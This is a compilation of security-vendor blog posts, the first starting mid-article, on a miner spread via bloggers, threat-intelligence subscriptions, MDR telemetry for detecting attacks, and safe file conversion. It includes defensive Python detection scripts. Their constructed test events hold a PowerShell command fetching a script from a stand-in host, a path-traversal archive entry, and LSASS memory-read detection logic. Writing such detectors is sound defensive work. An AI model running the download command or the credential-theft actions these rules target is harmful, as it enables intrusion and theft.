Don’t rush to put all the blame on the bloggers — in this case, they were simply following the orders of cybercriminals, unaware of what was really going on. Here’s how it works. First, the criminals file a complaint against a video about such a restriction-bypassing tool, pretending to be the software’s developers. Then they contact the video creator and persuade them to upload a new video, this time containing a link to their malicious website — claiming that this is now the only official download page. Of course, the bloggers have no idea the site is distributing malware — specifically, an archive containing a miner. And for those who’ve already uploaded three or more videos on the topic, refusal is not an option. The hackers threaten to file multiple complaints, and if there are three or more, the channel would be deleted.
In addition, the criminals spread their malware and installation guides through other Telegram and YouTube channels. Most of these have been deleted — but there’s nothing to stop them from creating new ones.
What about the miner?
The malware in question was a sample of SilentCryptoMiner, which we covered in October 2024. It’s a stealthy miner based on XMRig, another open-source mining tool. SilentCryptoMiner supports mining of multiple popular cryptocurrencies, including ETH, ETC, XMR, RTM, and others. The malware stops mining upon detecting certain processes, the list of which the criminals can provide remotely to evade detection. That makes it nearly impossible to detect without reliable protection.
For more about the malicious archive and how it persists in the system, check our post on Securelist.
How to protect yourself from miners
Ensure that all personal devices have trusted protection to safeguard against miners and other malware.
Avoid downloading programs from obscure or little-known sources. Stick to official platforms, but remember — malware can creep into them too.
Keep in mind that even the most reputable bloggers can unknowingly spread malware, including miners and stealers.
Here are some relevant articles you can read to learn more about miners and their dangers:
Source: Cybercriminals are distributing a miner disguised as a restriction-bypassing tool | Kaspersky official blog, 2025-03-05
How can security teams effectively monitor evolving attacks and stay ahead of constantly shifting attacker infrastructure? We spoke with a chief information security officer at a transport company about how they use subscriptions to Search Updates in Threat Intelligence Lookup to tackle this challenge.
Here’s what we learned.
Company Info
Without getting into any specifics, our company operates in the transportation sector, managing logistics across North America, Latin America, and Europe. Right now, the IT security team is at 30 professionals and as the CISO I’m responsible for overseeing strategic planning, risk management, and operations. Speaking of our use of ANY.RUN’s products, currently we have licenses for both the Interactive Sandbox and TI Lookup.
What is Threat Intelligence Lookup
TI Lookup from ANY.RUN provides a searchable database of over 40 types of indicators of compromise, attack, and behavior. The new data is extracted from thousands of public malware and phishing samples analyzed in ANY.RUN’s Interactive Sandbox every day.
Since all threats are executed in virtual machines, ANY.RUN takes a comprehensive snapshot of activities recorded during analysis, from network traffic and file paths to registry modifications and mutexes.
I’d say the entire transportation industry rests on email correspondence. Our company, despite being no match for giants like DHL, still has thousands of clients, contractors, and suppliers that we need to communicate with daily. Naturally, even a small email security slip-up, like exposing a few messages, could create major problems across the board. And attackers know this, too.
That’s why we pour a good chunk of the team’s resources into threat hunting and ensuring we have a grasp of the current threat landscape. We’re constantly monitoring for recent attacks, phishing scams, malware campaigns, new CVEs, anything that may somehow be of concern to us. Of course, we can’t gobble up intel on every single threat out there, so we narrow it down to what’s relevant for our industry, and some of the core clients’ industries.
Where TI Lookup Fits in the Threat Hunting Strategy
Like any good security setup, we break ours down into areas. TI Lookup adds value pretty much evenly across all of them, from checking indicators as part of triage to discovering threat context in incident response.
Yet, if we’re talking about threat hunting, we subscribe to Search Updates in TI Lookup to keep up with the changes in ongoing cyber attacks and automate the collection of new indicators of compromise (IOCs) and threat samples. Let me explain how it works.
Search Updates in TI Lookup
TI Lookup users can subscribe to custom search queries to receive timely updates on relevant Indicators of Compromise (IOCs), Indicators of Attack (IOAs), and Indicators of Behavior (IOBs) belonging to the threats of their interest.
Gathering data on the threats that are relevant to us
Converting the data into actionable signatures and detection rules
There are several sources for such data, with publicly available research and reports published by other companies being the most common one. The problem here is that attackers constantly shift infrastructure – C2 servers might cycle IPs every 48 hours. So, relying on the indicators we find in public reports can do only so much. And that is precisely the detection gap that Search Updates in TI Lookup help to bridge.
TI Lookup lets users receive result updates on queries of their interest
Subscribing to Search Updates in TI Lookup allows us to use more stable indicators of behavior (IOBs) to track all the latest changes in specific attacks and see if they are still ongoing. IOBs are things like the tools used by attackers, the kill chain techniques, and infection traces on the system such as created directories, file names and types, etc. These are the things that do not tend to expire as fast as attackers’ short-lived network infrastructure or hashes.
Query subscriptions are displayed in the left-side menu with the number of new results next to them
Essentially, with TI Lookup, we can put several IOBs related to a single attack together and use them in a search query to get notified about the latest samples and IOCs, which the threat hunting team can process and turn into detection rules.
The result is that we can follow active threats that may potentially target our company almost in real time because TI Lookup is updated every few hours with fresh data.
At the moment we subscribe to well over a hundred search queries. To give you an idea of what we monitor, I’ll give you a couple of common threats we tend to follow.
Geo-Targeted Threats
While our HQ is in the United States, we have several local offices, which also become extensively targeted with cyber attacks. Search Updates make it easier for us to track several types of threats occurring in a specific country.
For example, we make sure to check for new samples of email-distributed infostealers in Colombia:
TI Lookup displays the latest public sandbox analyses featuring infostealers together with .msg and .eml files
For this query, we get several updates almost every week.
One of the samples returned by TI Lookup involved AsyncRAT
We check the new samples and see if they have anything of value and if so, use the indicators extracted by the sandbox to make signatures to scan the company’s infrastructure for any matching threats.
Common Vulnerabilities and Exposures (CVEs)
Another top concern on any threat hunter’s list is CVEs, both old and new. One of the recent examples is CVE-2025-21298, the vulnerability where simply previewing a malicious .rtf document in Outlook leads to remote code execution and system compromise.
As soon as we learned about it, we made sure to go to TI Lookup and sign up for a query that would provide us with relevant samples in case any attackers decided to abuse this vulnerability.
In the query, we combined the file type (rtf) with Outlook, used the attc-doc (document attachment) tag, and excluded PDFs:
The Events tab in TI Lookup provides a list of command line logs recorded across relevant sandbox sessions
As a result, we now can minimize the manual research on this threat and in case an actual attack with this CVE is uploaded to TI Lookup, we’ll be notified about it.
Another thing that I think is worth mentioning here is that this CVE is a great example of how flexible TI Lookup can be. Despite not having a specific tag for this threat, we were able to make up for that by using the big selection of search parameters.
Credential-Theft Attacks
Phishing is by far the top threat our company faces, and one of the most common types of it is fake credential-stealing forms.
There is a campaign that has been going for a while, where attackers send emails that contain links to fake Microsoft 365 pages. The catch is that the malicious domain names are designed to masquerade as legit Microsoft ones. One of the standout things here is the use of “0” and “o” before “365”. Needless to say, the Search Updates feature does a great job letting us know about the new domains and actual examples of these attacks.
TI Lookup lists all the matching domains found across relevant sandbox sessions
The team collects new domains and email samples and improves detection of any possible phishing attempts against our own infrastructure.
Search Updates Hacks
One thing that’s not related to Query Subscriptions per se but is still of huge help is wildcards. They really add flexibility to the searches, so we can set up queries to be more specific or more general, depending on the indicators we use for a threat.
Just last week, we subscribed to a query for a new campaign where attackers use website addresses that start with “google.com” but then have random strings of characters afterwards.
To get the newest variants of these domains, we added the “?” wildcard to the query – which stands for any single character. We used four question marks to account for the random part of the domain.
Each of the domains can be explored further in the sandbox sessions where they were logged
Search Updates let us know every time a matching fake domain is added to TI Lookup’s database.
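As an added illustration of the two lookalike patterns described above (the “0”-for-“o” swap before “365”, and the “google.com” prefix followed by four arbitrary characters), the Python below is not ANY.RUN’s code or a TI Lookup feature: it translates a “?” wildcard pattern into a regex and normalises the digit swap, then runs both checks over a constructed list of hostnames that are made up and not real indicators.

```python
import re
from typing import Dict, List, Optional

# Constructed sample hostnames, as they might appear in sandbox network logs.
# All of them are made up for this illustration and are not real indicators.
SAMPLE_HOSTS = [
    "google.comxk2p.test",
    "google.com9f3q.test",
    "google.com.test",            # nothing random after "google.com": no match
    "mail.google.com",
    "login.micr0soft365.test",    # digit zero in place of the letter o
    "0ffice365-verify.test",
    "office365.test",             # genuine spelling: no lookalike flag
    "example.test",
]

# Brand tokens that the "0 for o" campaign imitates in front of "365".
BRAND_TOKENS = ("office365", "microsoft365")


def wildcard_to_regex(pattern: str) -> "re.Pattern[str]":
    """Compile a TI-Lookup-style pattern into an anchored, case-insensitive regex.

    Only the '?' wildcard described in the article (exactly one character) is
    implemented here; every other character is matched literally.
    """
    parts = ["." if ch == "?" else re.escape(ch) for ch in pattern]
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def match_wildcard(pattern: str, hosts: List[str]) -> List[str]:
    """Return the hosts that match the wildcard pattern, in input order."""
    rx = wildcard_to_regex(pattern)
    return [h for h in hosts if rx.match(h)]


def zero_for_o_lookalike(host: str) -> Optional[str]:
    """Return the brand token a host imitates by writing 'o' as '0' before '365'.

    Each DNS label is normalised by mapping '0' -> 'o'; if the normalised label
    contains a brand token that the raw label does not, it is a lookalike.
    """
    for label in host.lower().split("."):
        if "365" not in label or "0" not in label:
            continue
        normalised = label.replace("0", "o")
        for token in BRAND_TOKENS:
            if token in normalised and token not in label:
                return token
    return None


def triage(hosts: List[str], pattern: str) -> Dict[str, object]:
    """Run both checks and return what a hunter would turn into detection content."""
    lookalikes: Dict[str, str] = {}
    for host in hosts:
        token = zero_for_o_lookalike(host)
        if token:
            lookalikes[host] = token
    return {"wildcard_hits": match_wildcard(pattern, hosts), "lookalikes": lookalikes}


if __name__ == "__main__":
    result = triage(SAMPLE_HOSTS, "google.com????.test")
    for host in result["wildcard_hits"]:
        print("wildcard hit:", host)
    for host, token in result["lookalikes"].items():
        print(f"lookalike of {token}:", host)
```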
Impact on Security
In terms of the company’s security, TI Lookup provides us with some of the latest threat intelligence we can get. We can apply it immediately while indicators are still active to identify threats and protect the organization’s infrastructure in advance.
It also improves our awareness of the threat landscape, letting us track a wider array of attacks. We now have more data on a broader pool of threats than ever before and can identify the ones that are still ongoing and those that are no longer active.
Impact on Operations
If we’re talking about the team’s performance, the productivity definitely went up after we began using Query Subscriptions. Back in the day, we had to allocate a lot of time and staff to follow up on attacks that were relevant to us. This was a lot of manual work. I’m not saying that we no longer do it, but receiving Search Updates definitely made the process much easier.
We now get automated updates and can actually focus on more threats than before, because we no longer need to rely on guesswork in deciding which attacks will be more likely to affect us.
Now we simply create a query and hit subscribe. The more new results we see arriving for a particular threat in TI Lookup the higher priority it gets.
Team Feedback
Most of the team are well familiar with the ANY.RUN sandbox, so adopting TI Lookup felt natural for them. It was with some of the new folks on the team that we had to work a little harder to get them to a place where they could comfortably use the service. They mostly struggled with the query parameters and their meanings, as well as the tags in the sandbox, which are the same in TI Lookup. But most of them managed to become fairly proficient in a week or two.
Conclusion
We want to thank the guest for taking the time to share their story and real-world examples of using TI Lookup. A behind-the-scenes view of a threat hunting team’s work is always a rare privilege, and we really appreciate it. Our hope is that this article will help other users who are considering integrating the service in their organization lay the groundwork for a successful implementation.
As always, if you are open to letting others know how your team uses ANY.RUN’s products, we’ll be happy to hear from you at support@any.run.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
Source: How Transport Company Gets Real-Time IOC and IOB Updates on Active Cyber Attacks, 2025-03-05
To effectively counter cyberthreats that circumvent basic security measures, a managed detection and response (MDR) service must ensure the right data collection tools are in place in the protected organization from the start. In addition, the service team and the client team should regularly discuss how to improve telemetry collection, and what other data should be collected in order to stay ahead of evolving attacker tactics. Our experts not only advise clients on proper data collection, but also closely monitor the changing threat landscape to continuously refine the process. Our latest MDR service report details incidents in client infrastructures and the tactics attackers have used. A dedicated section of the report covers the most frequently triggered detection rules in 2024, and what’s required for them to function effectively.
Dumping registry hives
Among the suspicious operations frequently detected in high-severity incidents, the most common by far is the extraction of security-critical data from the system registry (dumping of sensitive registry hives). This activity was observed in 27% of high-severity incidents.
To detect such extraction, the MDR provider must have telemetry from an EDR system installed on all computers and servers in the protected organization. If there’s an endpoint protection system (EPP) that can detect suspicious (not necessarily malicious) activity, this can also serve as a source of the necessary data. An event that most definitely should be logged is registry access.
Malicious code in memory
Many attacks occur in such a way that malicious files are never stored on the hard drive. However, an endpoint protection system can detect malicious code in the memory of a system process or another memory segment. This occurred in 17% of high-severity incidents, and such events from the EPP must be instantly visible to the MDR service.
Suspicious services
The creation and execution of Windows services containing suspicious arbitrary code is a strong indicator of an unfolding cyberattack. This was also detected in nearly 17% of high-severity incidents. To detect this activity, telemetry must include OS system events, process launch information, and the complete contents of all startup lists.
Access to a malicious host
Though seemingly simple, this event appeared in 12% of high-severity incidents, and requires an up-to-date IP reputation database for detection. In a company’s infrastructure, access attempts can be tracked in multiple ways: EPP detection, network-level monitoring, and DNS/HTTP request analysis. The MDR provider can also use threat intelligence databases to enrich the client’s telemetry.
Memory fragment dumps
To escalate an attack within a victim’s network after the initial compromise, attackers often try to obtain credentials on an infected machine. If they get lucky, these may be network administrator credentials, allowing them to quickly take over servers. A classic technique for achieving this is extracting and saving memory fragments related to the LSASS (Local Security Authority Subsystem Service). In 2024, we detected this technique in nearly 12% of high-severity incidents.
Attempts to capture LSASS memory can be detected in multiple ways: using certain EPP and EDR rules, analyzing command-line parameters when launching applications, scripts and processes, and monitoring access to LSASS.
Executing a low-reputation object
Although a file, script, or document may not be definitively malicious, if it was previously observed in suspicious activity, MDR specialists must check whether a cyberattack is underway. This requires telemetry that logs processes launching suspicious files. And, of course, threat intelligence is needed to flag the file’s bad reputation. Execution of low-reputation objects was observed in 10% of high-severity incidents.
Adding privileged users
Beyond stealing administrator accounts, attackers often create their own accounts and then elevate their privileges. In 9% of high-severity incidents, an account was added to a privileged corporate domain group. To detect this, OS event collection must capture all account modifications.
Remote process execution
In over 5% of incidents, there was a process involved that was launched by a remote user. To monitor such events, computers must log process launch events and the loading of executable file sections into memory.
Malicious address in event parameters
A known malicious URL may appear in any event parameter, but most commonly in the command line of the running process. This was observed in nearly 5% of high-severity incidents, making it crucial to always include detailed parameters of logged events, including the full command line, in the telemetry. For MDR providers, such detection is only possible with access to a large URL-reputation database (which we, of course, have).
Telemetry sources
Above, we’ve highlighted the most critical events that help an MDR team detect and prevent serious incidents. The full report covers additional events and a deeper analysis of attacker tactics. The list above makes it clear what types of data must be transmitted to an MDR service in real time for it to work effectively. First and foremost, this includes:
Telemetry from endpoint protection solutions (EPP) or EDR agents. In today’s organizations, traditional “antivirus” and detection and response tools are often integrated into a single product. This provides key telemetry from computers and servers, so its presence is essential on all machines, along with the configuration of detailed event logging in collaboration with the MDR team.
OS events. Properly configured Windows logs provide critical information about account manipulations, process launches and terminations, and more. On Linux systems, the same role is played by the Audit Daemon (auditd). Special attention must be given to configuring logging on all of the organization’s servers. Detailed recommendations for Windows settings can be found in our knowledge base. The Sysmon tool from the Microsoft Sysinternals suite enhances the effectiveness of Windows logs.
Events from network devices. It’s critical to configure detailed logging on network devices — primarily firewalls and web filters, but also routers, proxies, and DNS servers if used in the company.
Cloud environment logs. Attackers frequently compromise cloud infrastructure and SaaS tools, where the previously mentioned logs are typically not available. Therefore, it’s essential to set up comprehensive security-focused logging using cloud-native tools, such as AWS CloudTrail.
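As an added example (not from the report or any Kaspersky product), the Python below runs three of the detections described above over constructed Windows Security and Sysmon events and reports where a process-creation event logged without its command line would leave the URL rule blind, which is the telemetry requirement the text stresses. The event IDs (4728/4732/4756 for group membership changes, 4688 for process creation, Sysmon event 10 for process access) are standard identifiers; the hosts, accounts, paths and URL are invented, and the bad-URL set stands in for a reputation database.

```python
import re
from typing import Callable, Dict, List, Optional

# Constructed sample telemetry, loosely modelled on Windows Security log and
# Sysmon event fields. Hosts, accounts, paths and the URL are made up for this
# illustration; KNOWN_BAD_URLS stands in for a real URL-reputation database.
SAMPLE_EVENTS = [
    {"source": "security", "event_id": 4728, "host": "dc01", "subject": "CORP\\jdoe",
     "member": "CORP\\svc-backup2", "group": "Domain Admins"},
    {"source": "security", "event_id": 4732, "host": "ws17", "subject": "CORP\\jdoe",
     "member": "ws17\\helpdesk", "group": "Remote Desktop Users"},
    {"source": "sysmon", "event_id": 10, "host": "ws17",
     "source_image": "C:\\Users\\Public\\svc.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"},
    {"source": "sysmon", "event_id": 10, "host": "ws17",
     "source_image": "C:\\Program Files\\EPP\\scanner.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1000"},
    {"source": "security", "event_id": 4688, "host": "ws22", "subject": "CORP\\asmith",
     "command_line": "powershell.exe -w hidden iwr http://bad.example/stage2.ps1 -o s.ps1"},
    {"source": "security", "event_id": 4688, "host": "ws22", "subject": "CORP\\asmith",
     "command_line": "notepad.exe C:\\Users\\asmith\\notes.txt"},
    # Process creation recorded without its command line: the URL rule cannot fire.
    {"source": "security", "event_id": 4688, "host": "ws31", "subject": "CORP\\bwong"},
]

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to global / local / universal group
KNOWN_BAD_URLS = {"http://bad.example/stage2.ps1"}  # placeholder reputation data
PROCESS_VM_READ = 0x0010                # access right needed to read another process's memory
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

Event = Dict[str, object]


def detect_privileged_group_add(ev: Event) -> Optional[str]:
    """Account added to a privileged group (Windows Security 4728/4732/4756)."""
    if ev.get("event_id") in GROUP_ADD_EVENTS and ev.get("group") in PRIVILEGED_GROUPS:
        return f"{ev['subject']} added {ev['member']} to {ev['group']} on {ev['host']}"
    return None


def detect_lsass_memory_access(ev: Event) -> Optional[str]:
    """Another process opened lsass.exe with read access (Sysmon event 10, ProcessAccess)."""
    if ev.get("source") != "sysmon" or ev.get("event_id") != 10:
        return None
    if not str(ev.get("target_image", "")).lower().endswith("\\lsass.exe"):
        return None
    granted = int(str(ev.get("granted_access", "0x0")), 16)
    if granted & PROCESS_VM_READ:
        return f"{ev['source_image']} read LSASS memory on {ev['host']}"
    return None


def detect_malicious_url_in_cmdline(ev: Event) -> Optional[str]:
    """Known-bad URL inside the full command line of a created process (4688)."""
    if ev.get("event_id") != 4688 or "command_line" not in ev:
        return None
    for url in URL_RE.findall(str(ev["command_line"])):
        if url in KNOWN_BAD_URLS:
            return f"{ev['subject']} launched a process referencing {url} on {ev['host']}"
    return None


def find_telemetry_gaps(events: List[Event]) -> List[str]:
    """Process-creation events logged without a command line blind the URL rule."""
    return [f"{ev['host']}: process creation logged without command line"
            for ev in events if ev.get("event_id") == 4688 and "command_line" not in ev]


RULES: Dict[str, Callable[[Event], Optional[str]]] = {
    "privileged_group_add": detect_privileged_group_add,
    "lsass_memory_access": detect_lsass_memory_access,
    "malicious_url_in_cmdline": detect_malicious_url_in_cmdline,
}


def run_rules(events: List[Event]) -> Dict[str, List[str]]:
    """Apply every rule to every event and group the findings by rule name."""
    findings: Dict[str, List[str]] = {name: [] for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            hit = rule(ev)
            if hit:
                findings[name].append(hit)
    findings["telemetry_gaps"] = find_telemetry_gaps(events)
    return findings


if __name__ == "__main__":
    for rule_name, hits in run_rules(SAMPLE_EVENTS).items():
        for hit in hits:
            print(f"[{rule_name}] {hit}")
```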
Source: What to collect on computers for monitoring complex threats, 2025-03-04
February brought major enhancements to ANY.RUN, improving threat intelligence, detection capabilities, and overall user experience.
With the launch of Threat Intelligence Reports, security professionals now have access to detailed, expert-driven analyses of cyber threats, malware, and APT activities.
We also introduced a redesigned website, making navigation more intuitive and structured.
On the detection side, we significantly improved our threat-hunting capabilities, adding 314 new Suricata rules, refining behavior signatures, and expanding our YARA rule database. These updates strengthen real-time threat visibility and detection accuracy, helping analysts respond faster to emerging cyber threats.
Let’s take a closer look at February’s updates and how they enhance your malware-hunting workflow.
Product Updates
Threat Intelligence Reports
In February, ANY.RUN introduced Threat Intelligence Reports in TI Lookup: detailed research on cyber threats, providing security professionals and decision-makers with actionable insights.
Curated by our experts, these reports support threat monitoring, incident response, R&D, and strategic planning, covering malware, ransomware, phishing campaigns, and APTs.
Built on real-world threat data, sources include our Interactive Sandbox, TI Lookup, and community-driven malware analyses.
Each report provides a detailed threat overview, covering key aspects such as:
Threat actor or malware profile: Origins, objectives, targeted industries, and regions.
TTPs: Methods used by attackers, helping in detection and mitigation.
IOCs, IOBs, IOAs: Critical data for identifying threats in your environment.
YARA and SIGMA rules: Ready-to-use detection rules for security systems.
Sandbox analysis links: Direct access to real-world threat samples in action.
Additional references: Supporting research and external resources for deeper insights.
New Website Design: A More User-Friendly Experience
In February, we introduced a redesigned ANY.RUN website, making it more intuitive, structured, and easier to navigate. The new design makes sure that all essential cybersecurity resources and solutions are now better organized and easily accessible.
The new redesigned webpage of ANY.RUN
Whether you’re exploring threat intelligence, running sandbox analyses, or researching cybersecurity insights, the updated layout enhances usability for both security experts and new users.
Threat Coverage Updates
Suricata Rules
In February, we added 314 new Suricata rules, strengthening our network-based threat detection. Notable updates include:
A Booking.com phishing rule, designed to detect fraudulent activity targeting users.
A rule for Australia Gov phishing attempts, though it covers only partial cases due to dynamic URL changes and regional access restrictions.
New Behavior Signatures
This month, we expanded behavior-based detection, adding new mutex findings, threat detections, and suspicious activity signatures. These updates improve the ability to track malware persistence mechanisms and evasive techniques in real-time.
Various software-related mutex detections, including COYOTE mutex, Proxifier, Wireshark, Java, Adguardvpn, Cheatengine, Opera, Electron Js, Adobeinstaller, Hotbar, Quickdriverupdater, and Pcappstore
New YARA Rule Updates
In February, we expanded our YARA rule database, enhancing malware detection and classification. The latest rules target a variety of stealers, RATs, ransomware, and loaders, improving detection accuracy for emerging threats.
You almost certainly know the situation when a friend or colleague sends you files in a format you can’t open. For example, you asked for photos, expecting JPEGs or PNGs, but instead they arrive in HEIC format. What do most people do in this case? That’s right, they look for a free online file converter.
If you’re a long-time reader of our Kaspersky Daily blog, you probably already know that the most popular way of doing almost anything is hardly ever the safest. File conversion is no different. Let’s figure out together what threats are lurking inside free online converters, and find out how to change file formats safely.
Why is this important? Because converting a file is not simply a matter of changing its extension — otherwise you could just rename the file from, say, EPUB to MP3. Instead, the converter program must read the file, understand what it contains, convert the data and re-save it in a different format — and each of these stages poses its own threats.
Personal data leakage, malware, and other threats
The first risk that springs to mind is personal data leakage. Even if you’re a “who on earth needs my data?” kind of person, you should still take care: your vacation snaps may be of no use to anyone, but confidential work documents are a different kettle of fish. When you upload a file to an online converter, you can never be sure that the site won’t save a copy of your file for its own purposes. Uploaded data can easily end up in the hands of scammers, and even be used to launch an attack on your company. And if you get fingered as the intruders’ entry point into the corporate network, your infosec team will hardly be thanking you.
Another common risk is malware infection. Some dubious converter sites may modify your files or add malicious code to the converted file — and without reliable protection you won’t know about it until it’s too late. The converted files may contain scripts, Trojans, macros, and other nasty stuff we’ve covered in detail many times.
Converter sites may also be phishing, so services asking you to register, enter a load of personal data, and buy a subscription just to convert a file from, say, PDF to DOC, should be eyed with suspicion. If you still plan to use an online converter, look for one that doesn’t require registration, and never give it your payment details.
How to convert files locally
The safest way is to convert files locally; that is, on your own device without using third-party sites. This way, the data is guaranteed to remain confidential — at least until you connect to the internet. You can change a file’s format using either system tools or popular programs.
For text and spreadsheet files, as well as presentations, Microsoft Office can help. It can read many file formats using the File → Open or File → Import commands (depending on the version of Office and the operating system), and save them in different formats using the File → Save as → Save as type (or File format) or File → Export commands. The list of available formats is long: from PDF and HTML to the OpenDocument standard.
If you don’t have access to Microsoft products, you can use the free alternatives LibreOffice and OpenOffice, which also support various text and table file formats. On Windows, text documents can also be converted in a built-in WordPad editor, although it reads far fewer file types.
For macOS users, Apple’s office applications (Pages, Numbers, Keynote) recognize and save documents in many different formats.
As for graphics files, things are even simpler. Built-in operating-system tools can help convert images from PNG to JPEG. On Windows, just use File → Save as in Paint. macOS users don’t even need to open any programs — just right-click the image in Finder and select Quick Actions → Convert Image. The window that opens gives you a choice of format (PNG, JPEG, HEIF) and converted image size.
If the above conversion options aren’t enough — for example, you’re handling audio/video files or specific file formats — look for offline tools with a solid reputation as free and open-source software (FOSS).
For video (and many audio) formats, check out Handbrake (Windows, macOS, Linux) and Shutter Encoder (Windows, macOS, Linux); for audio, try Audacity, and for images, ImageMagick (Windows, macOS, Linux).
Most multimedia converters simply add a graphical interface to FFmpeg, perhaps the top tool for converting multimedia formats. Its only drawback (which for some is a plus) is that it only works from the command line.
If you’re fine with the command line, FFmpeg is the obvious choice (and if you are, you’ve probably got it installed already). Another great choice for command-line fans is Pandoc — a versatile converter of text and markup formats. Incidentally, under Extras on the Pandoc website, you can find many third-party utilities for adding a graphical interface to this converter, or embedding it in other editors, services, or even operating systems.
All of the above converters are FOSS (free and open-source software), and support at least the most popular operating systems: Windows, macOS, Linux.
When choosing other offline converters, make sure that the conversion really does take place locally — many tools simply provide an interface to online converters and still send your source files to a server. This is very easy to check by disconnecting from the internet before converting. If the tool doesn’t work, it’s not an offline converter.
How to convert files online as safely as possible
Sometimes there’s no avoiding online converters — for example, you were sent a file in some highly exotic or outdated format. The next section looks at how to minimize threats when converting files online.
Alas, it’s impossible to guarantee confidentiality when using an online converter. Its creators can write whatever they want in the site’s policies, but you’ll never know what actually happens to your uploaded data. Therefore, the golden rule is: never convert sensitive information online.
If you have a Google account (and who doesn’t?), you can upload the file you want to convert to Google Drive (most office formats are accepted), right-click, and open it in Google Docs/Sheets/Slides, then download it in a different format. Among the pluses, this method also works on mobile devices — although in this case it’s more convenient to open the file in the relevant Google editing tool.
Another fairly safe way to convert either text or graphics files is Adobe’s online converter. You can even use it for free on a smartphone — but there’s a catch: all uploaded data gets stored on Adobe’s servers, making this method unsuitable for confidential files.
Follow these rules to ensure maximum safety when converting files online:
Use reputable online converters.
Open the converter site in a new browser window in Incognito mode; this will reduce the amount of information collected about you — but not down to zero.
Use a reliable VPN to hide your real IP address from the converter site.
Review the online converter’s privacy policy to understand how your data will be handled. Make sure the service does not collect, store, or transfer information without your consent — or at least claims not to.
Check that the files for conversion do not contain confidential information.
Scan the converted files with an antivirus. Be very wary if the converter site wants you to download the result in an archive — especially a password-protected one, since this is the most common way to conceal a virus from security software. If you don’t have any protection software on your device (heaven forbid), you can scan the downloaded file using our online file checker.
Avoid unverified sites that require registration and payment details.
Unzip this
Lastly, a small life-hack that few people know about. Sometimes you don’t need to convert a file to another format at all, but just extract information from it; for example — pull images out of a text document or presentation in their original format. Doing this even with native editors is usually time-consuming and inconvenient — you have to export the images one by one, and the editors might change their size or compress them, deteriorating the picture quality.
But there’s a way round this. The secret is that files of many formats are nothing more than a compressed folder with subfolders that store “pieces of the puzzle”: text, images, embedded videos, and the like. And it’s all zipped. That means that almost all office-suite files are ZIPs with the extension changed to DOCX, PPTX, PAGES, etc.
To extract all the contents from this “archive”, you simply need to rename the file, changing its extension to ZIP, and then unzip it. The result will be a folder with subfolders in which all the “ingredients” of the original document are neatly laid out.
So, if you come across an unknown file format, first of all scan it for viruses with a reliable security solution, then make a copy of it, change the extension to ZIP (in macOS, if the file extension is hidden, you may need to press ⌘+I to change it), and try to unzip the file — in many cases this will work. Next, have a rummage around in the resulting folder — you’ll find all sorts of goodies!
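The "rename it to ZIP" trick described above works because the office formats are ZIP containers. The following added example (not from the Kaspersky post) does the same inspection programmatically with Python's standard zipfile module, so no renaming is needed: it confirms the file is an OOXML-style container, lists the embedded images in their original formats, and extracts them without re-encoding. It also refuses archive entries with `..` or absolute paths, a pattern a crafted document could carry, which matters because the post's advice to scan before unzipping applies just as much to scripted extraction. The sample document is constructed in memory so the script runs offline.

```python
"""Inspect an office document as the ZIP container it is, without renaming it.

Added example, not code from the Kaspersky post. It builds a minimal,
constructed DOCX-like archive in memory (the real OOXML layout has more
parts, but the container is the same kind of ZIP), lists the "ingredients",
and pulls out the embedded images while refusing any entry whose path
would escape the target folder.
"""
import io
import os
import posixpath
import tempfile
import zipfile

# Constructed image bytes: PNG / JPEG magic numbers plus filler.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
FAKE_JPEG = b"\xff\xd8\xff" + b"\x00" * 8


def build_sample_docx() -> bytes:
    """Constructed stand-in for a .docx, including one hostile entry name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document>hello</w:document>")
        zf.writestr("word/media/image1.png", FAKE_PNG)
        zf.writestr("word/media/image2.jpeg", FAKE_JPEG)
        # An entry of the kind a crafted archive might carry (constructed):
        # it must never be written relative to the output folder.
        zf.writestr("../../evil.png", FAKE_PNG)
    return buf.getvalue()


def is_office_zip(data: bytes) -> bool:
    """True if the bytes are a ZIP that carries the OOXML content-types part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return "[Content_Types].xml" in zf.namelist()
    except zipfile.BadZipFile:
        return False


def safe_member(name: str) -> bool:
    """Reject absolute paths, backslashes and '..' components ("zip slip")."""
    norm = posixpath.normpath(name)
    return not (name.startswith("/") or norm.startswith("..") or "\\" in name)


def list_media(data: bytes) -> list[str]:
    """Names of embedded images (Word, PowerPoint and Excel media folders)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return sorted(
            n for n in zf.namelist()
            if safe_member(n)
            and n.startswith(("word/media/", "ppt/media/", "xl/media/"))
        )


def extract_media(data: bytes, out_dir: str) -> list[str]:
    """Write the images to out_dir byte-for-byte (no re-encoding); return paths."""
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in list_media(data):
            # basename() flattens the folder structure and drops any path tricks.
            target = os.path.join(out_dir, os.path.basename(name))
            with zf.open(name) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


if __name__ == "__main__":
    sample = build_sample_docx()
    print("office container:", is_office_zip(sample))
    print("media parts:", list_media(sample))
    with tempfile.TemporaryDirectory() as d:
        print("extracted:", extract_media(sample, d))
```

Point it at a real `.docx`, `.pptx` or `.xlsx` by reading the file's bytes instead of calling `build_sample_docx()`; the images come out exactly as they were embedded, which is the quality advantage the post describes.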
How to safely convert files | Kaspersky official blog (admin, 2025-03-03)
